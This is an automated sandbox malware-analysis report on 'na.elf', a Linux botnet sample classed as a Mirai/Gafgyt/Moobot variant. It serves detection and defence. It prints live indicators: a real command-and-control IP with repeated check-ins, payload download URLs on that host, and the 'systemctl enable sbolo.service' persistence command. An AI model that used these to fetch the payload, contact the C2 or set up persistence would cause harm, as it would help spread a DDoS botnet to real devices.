Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
na.elf

Overview

General Information

Sample name:na.elf
Analysis ID:1528129
MD5:535cff3a16d579f89346b0916110d25e
SHA1:a6f65c0f3be7ee71b23973624c60f89ce3bf8f3b
SHA256:c6be94538af0c32feb17a797fb510bac68f85310700df4b84ea6bb31aa5b5bf2
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai, Gafgyt, Moobot, Okiru
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Detected Mirai
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Gafgyt
Yara detected Moobot
Yara detected Okiru
Connects to many ports of the same IP (likely port scanning)
Machine Learning detection for sample
Detected TCP or UDP traffic on non-standard ports
Executes commands using a shell command-line interpreter
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Yara signature match

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1528129
Start date and time:2024-10-07 16:22:33 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 58s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:na.elf
Detection:MAL
Classification:mal100.troj.linELF@0/2@32/0
  • VT rate limit hit for: na.elf
Command:/tmp/na.elf
PID:5452
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
bolu_botnet_done.
Standard Error:
  • system is lnxubuntu20
  • na.elf (PID: 5452, Parent: 5376, MD5: 535cff3a16d579f89346b0916110d25e) Arguments: /tmp/na.elf
    • na.elf New Fork (PID: 5453, Parent: 5452)
    • na.elf New Fork (PID: 5454, Parent: 5452)
    • sh (PID: 5454, Parent: 5452, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable sbolo.service > /dev/null 2>&1"
      • sh New Fork (PID: 5455, Parent: 5454)
      • systemctl (PID: 5455, Parent: 5454, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable sbolo.service
    • na.elf New Fork (PID: 5459, Parent: 5452)
  • systemd New Fork (PID: 5457, Parent: 5456)
  • snapd-env-generator (PID: 5457, Parent: 5456, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
NameDescriptionAttributionBlogpost URLsLink
Bashlite, GafgytBashlite is a malware family which infects Linux systems in order to launch distributed denial-of-service attacks (DDoS). Originally it was also known under the name Bashdoor, but this term now refers to the exploit method used by the malware. It has been used to launch attacks of up to 400 Gbps.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite
NameDescriptionAttributionBlogpost URLsLink
MooBotNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot
SourceRuleDescriptionAuthorStrings
na.elfJoeSecurity_GafgytYara detected GafgytJoe Security
    na.elfJoeSecurity_OkiruYara detected OkiruJoe Security
      na.elfJoeSecurity_MoobotYara detected MoobotJoe Security
        na.elfLinux_Trojan_Gafgyt_9e9530a7unknownunknown
        • 0xf1e4:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
        na.elfLinux_Trojan_Gafgyt_807911a2unknownunknown
        • 0xf9b3:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
        Click to see the 11 entries
        SourceRuleDescriptionAuthorStrings
        5452.1.0000000000400000.000000000041c000.r-x.sdmpJoeSecurity_GafgytYara detected GafgytJoe Security
          5452.1.0000000000400000.000000000041c000.r-x.sdmpJoeSecurity_OkiruYara detected OkiruJoe Security
            5452.1.0000000000400000.000000000041c000.r-x.sdmpJoeSecurity_MoobotYara detected MoobotJoe Security
              5452.1.0000000000400000.000000000041c000.r-x.sdmpLinux_Trojan_Gafgyt_9e9530a7unknownunknown
              • 0xf1e4:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
              5452.1.0000000000400000.000000000041c000.r-x.sdmpLinux_Trojan_Gafgyt_807911a2unknownunknown
              • 0xf9b3:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
              Click to see the 13 entries
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-07T16:23:18.977987+020020304901Malware Command and Control Activity Detected192.168.2.136001291.200.103.11723561TCP
              2024-10-07T16:23:23.800327+020020304901Malware Command and Control Activity Detected192.168.2.136001491.200.103.11723561TCP
              2024-10-07T16:23:28.351917+020020304901Malware Command and Control Activity Detected192.168.2.136001691.200.103.11723561TCP
              2024-10-07T16:23:35.989973+020020304901Malware Command and Control Activity Detected192.168.2.136001891.200.103.11723561TCP
              2024-10-07T16:23:47.820418+020020304901Malware Command and Control Activity Detected192.168.2.136002091.200.103.11723561TCP
              2024-10-07T16:23:56.446305+020020304901Malware Command and Control Activity Detected192.168.2.136002291.200.103.11723561TCP
              2024-10-07T16:24:08.113075+020020304901Malware Command and Control Activity Detected192.168.2.136002491.200.103.11723561TCP
              2024-10-07T16:24:10.727857+020020304901Malware Command and Control Activity Detected192.168.2.136002691.200.103.11723561TCP
              2024-10-07T16:24:15.442946+020020304901Malware Command and Control Activity Detected192.168.2.136002891.200.103.11723561TCP
              2024-10-07T16:24:18.156729+020020304901Malware Command and Control Activity Detected192.168.2.136003091.200.103.11723561TCP
              2024-10-07T16:24:21.784212+020020304901Malware Command and Control Activity Detected192.168.2.136003291.200.103.11723561TCP
              2024-10-07T16:24:32.795048+020020304901Malware Command and Control Activity Detected192.168.2.136003491.200.103.11723561TCP
              2024-10-07T16:24:43.413248+020020304901Malware Command and Control Activity Detected192.168.2.136003691.200.103.11723561TCP
              2024-10-07T16:24:49.061773+020020304901Malware Command and Control Activity Detected192.168.2.136003891.200.103.11723561TCP
              2024-10-07T16:24:52.790287+020020304901Malware Command and Control Activity Detected192.168.2.136004091.200.103.11723561TCP
              2024-10-07T16:24:59.417908+020020304901Malware Command and Control Activity Detected192.168.2.136004291.200.103.11723561TCP
              2024-10-07T16:25:08.087657+020020304901Malware Command and Control Activity Detected192.168.2.136004491.200.103.11723561TCP
              2024-10-07T16:25:12.768389+020020304901Malware Command and Control Activity Detected192.168.2.136004691.200.103.11723561TCP
              2024-10-07T16:25:22.401937+020020304901Malware Command and Control Activity Detected192.168.2.136004891.200.103.11723561TCP
              2024-10-07T16:25:25.059438+020020304901Malware Command and Control Activity Detected192.168.2.136005091.200.103.11723561TCP
              2024-10-07T16:25:33.713552+020020304901Malware Command and Control Activity Detected192.168.2.136005291.200.103.11723561TCP
              2024-10-07T16:25:43.368163+020020304901Malware Command and Control Activity Detected192.168.2.136005491.200.103.11723561TCP
              2024-10-07T16:25:51.012679+020020304901Malware Command and Control Activity Detected192.168.2.136005691.200.103.11723561TCP
              2024-10-07T16:26:02.655537+020020304901Malware Command and Control Activity Detected192.168.2.136005891.200.103.11723561TCP
              2024-10-07T16:26:12.352464+020020304901Malware Command and Control Activity Detected192.168.2.136006091.200.103.11723561TCP
              2024-10-07T16:26:19.445450+020020304901Malware Command and Control Activity Detected192.168.2.136006291.200.103.11723561TCP
              2024-10-07T16:26:29.074585+020020304901Malware Command and Control Activity Detected192.168.2.136006491.200.103.11723561TCP
              2024-10-07T16:26:39.705358+020020304901Malware Command and Control Activity Detected192.168.2.136006691.200.103.11723561TCP
              2024-10-07T16:26:46.292582+020020304901Malware Command and Control Activity Detected192.168.2.136006891.200.103.11723561TCP
              2024-10-07T16:26:48.948300+020020304901Malware Command and Control Activity Detected192.168.2.136007091.200.103.11723561TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: na.elfReversingLabs: Detection: 57%
              Source: na.elfJoe Sandbox ML: detected
              Source: na.elfString: HTTP/1.1 200 OKbolubotnetarmbolubotnetarm5bolubotnetarm6bolubotnetarm7bolubotnetmipsbolubotnetmpslbolubotnetx86_64bolubotnetsh4abcdefghijklmnopqrstuvwxyz/proc/%d/exe/tmp/%s%s%c/proc/self/cmdline/proc/%d/proc/self/proc/proc/%d/cmdlinenetstatwgetcurl/bin/busybox/proc//proc/%s/exe/proc/self/exevar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/usr/lib/systemd/systemdshellmnt/sys/boot/media/apache2srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spoolsshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearencodersystem/root/dvr_gui//root/dvr_app//anko-app//opt/.x86.x86_64.arm.arm5.arm6.arm7.mips.mipsel.sh4.ppcx86.x86_64.arm.arm5.arm6.arm7.mips.mipsel.sh4.ppc.anko-app/ankosample _8182T_1104/usr/libexec/openssh/sftp-serverW

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60012 -> 91.200.103.117:23561
              Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60018 -> 91.200.103.117:23561
              Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60024 -> 91.200.103.117:23561
              Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60030 -> 91.200.103.117:23561
              Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60026 -> 91.200.103.117:23561
              Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60016 -> 91.200.103.117:23561
              Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60042 -> 91.200.103.117:23561
              Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60040 -> 91.200.103.117:23561
              Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60028 -> 91.200.103.117:23561
              Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60022 -> 91.200.103.117:23561
              Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60038 -> 91.200.103.117:23561
              Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60034 -> 91.200.103.117:23561
              Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60066 -> 91.200.103.117:23561
              Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60014 -> 91.200.103.117:23561
              Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60058 -> 91.200.103.117:23561
              Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60062 -> 91.200.103.117:23561
              Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60050 -> 91.200.103.117:23561
              Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60052 -> 91.200.103.117:23561
              Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60036 -> 91.200.103.117:23561
              Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60060 -> 91.200.103.117:23561
              Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60032 -> 91.200.103.117:23561
              Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60068 -> 91.200.103.117:23561
              Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60044 -> 91.200.103.117:23561
              Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60056 -> 91.200.103.117:23561
              Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60064 -> 91.200.103.117:23561
              Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60046 -> 91.200.103.117:23561
              Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60070 -> 91.200.103.117:23561
              Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60054 -> 91.200.103.117:23561
              Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60048 -> 91.200.103.117:23561
              Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60020 -> 91.200.103.117:23561
              Source: global trafficTCP traffic: 91.200.103.117 ports 1,2,3,5,6,23561
              Source: global trafficTCP traffic: 192.168.2.13:60012 -> 91.200.103.117:23561
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: yi0key.heleh.com.vn
              Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
              Source: na.elfString found in binary or memory: http://91.200.103.117/%s
              Source: na.elf, 5452.1.00000000016e2000.00000000016e4000.rw-.sdmp, sbolo.service.12.drString found in binary or memory: http://91.200.103.117/bolubotnetx86_64

              System Summary

              barindex
              Source: na.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
              Source: na.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
              Source: na.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
              Source: na.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
              Source: na.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d0c57a2e Author: unknown
              Source: na.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
              Source: na.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
              Source: na.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
              Source: na.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
              Source: na.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_520deeb8 Author: unknown
              Source: na.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
              Source: na.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_01e4a728 Author: unknown
              Source: na.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
              Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
              Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
              Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
              Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
              Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d0c57a2e Author: unknown
              Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
              Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
              Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
              Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
              Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 Author: unknown
              Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
              Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 Author: unknown
              Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
              Source: Initial sampleString containing 'busybox' found: /bin/busybox
              Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OKbolubotnetarmbolubotnetarm5bolubotnetarm6bolubotnetarm7bolubotnetmipsbolubotnetmpslbolubotnetx86_64bolubotnetsh4abcdefghijklmnopqrstuvwxyz/proc/%d/exe/tmp/%s%s%c/proc/self/cmdline/proc/%d/proc/self/proc/proc/%d/cmdlinenetstatwgetcurl/bin/busybox/proc//proc/%s/exe/proc/self/exevar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/usr/lib/systemd/systemdshellmnt/sys/boot/media/apache2srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spoolsshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearencodersystem/root/dvr_gui//root/dvr_app//anko-app//opt/.x86.x86_64.arm.arm5.arm6.arm7.mips.mipsel.sh4.ppcx86.x86_64.arm.arm5.arm6.arm7.mips.mipsel.sh4.ppc.anko-app/ankosample _8182T_1104/usr/libexec/openssh/sftp-serverW
              Source: ELF static info symbol of initial sample.symtab present: no
              Source: na.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
              Source: na.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
              Source: na.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
              Source: na.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
              Source: na.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d0c57a2e os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ee7d3a33575ed3aa7431489a8fb18bf30cfd5d6c776066ab2a27f93303124b6, id = d0c57a2e-c10c-436c-be13-50a269326cf2, last_modified = 2021-09-16
              Source: na.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
              Source: na.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
              Source: na.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
              Source: na.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
              Source: na.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
              Source: na.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
              Source: na.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
              Source: na.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
              Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
              Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
              Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
              Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
              Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d0c57a2e os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ee7d3a33575ed3aa7431489a8fb18bf30cfd5d6c776066ab2a27f93303124b6, id = d0c57a2e-c10c-436c-be13-50a269326cf2, last_modified = 2021-09-16
              Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
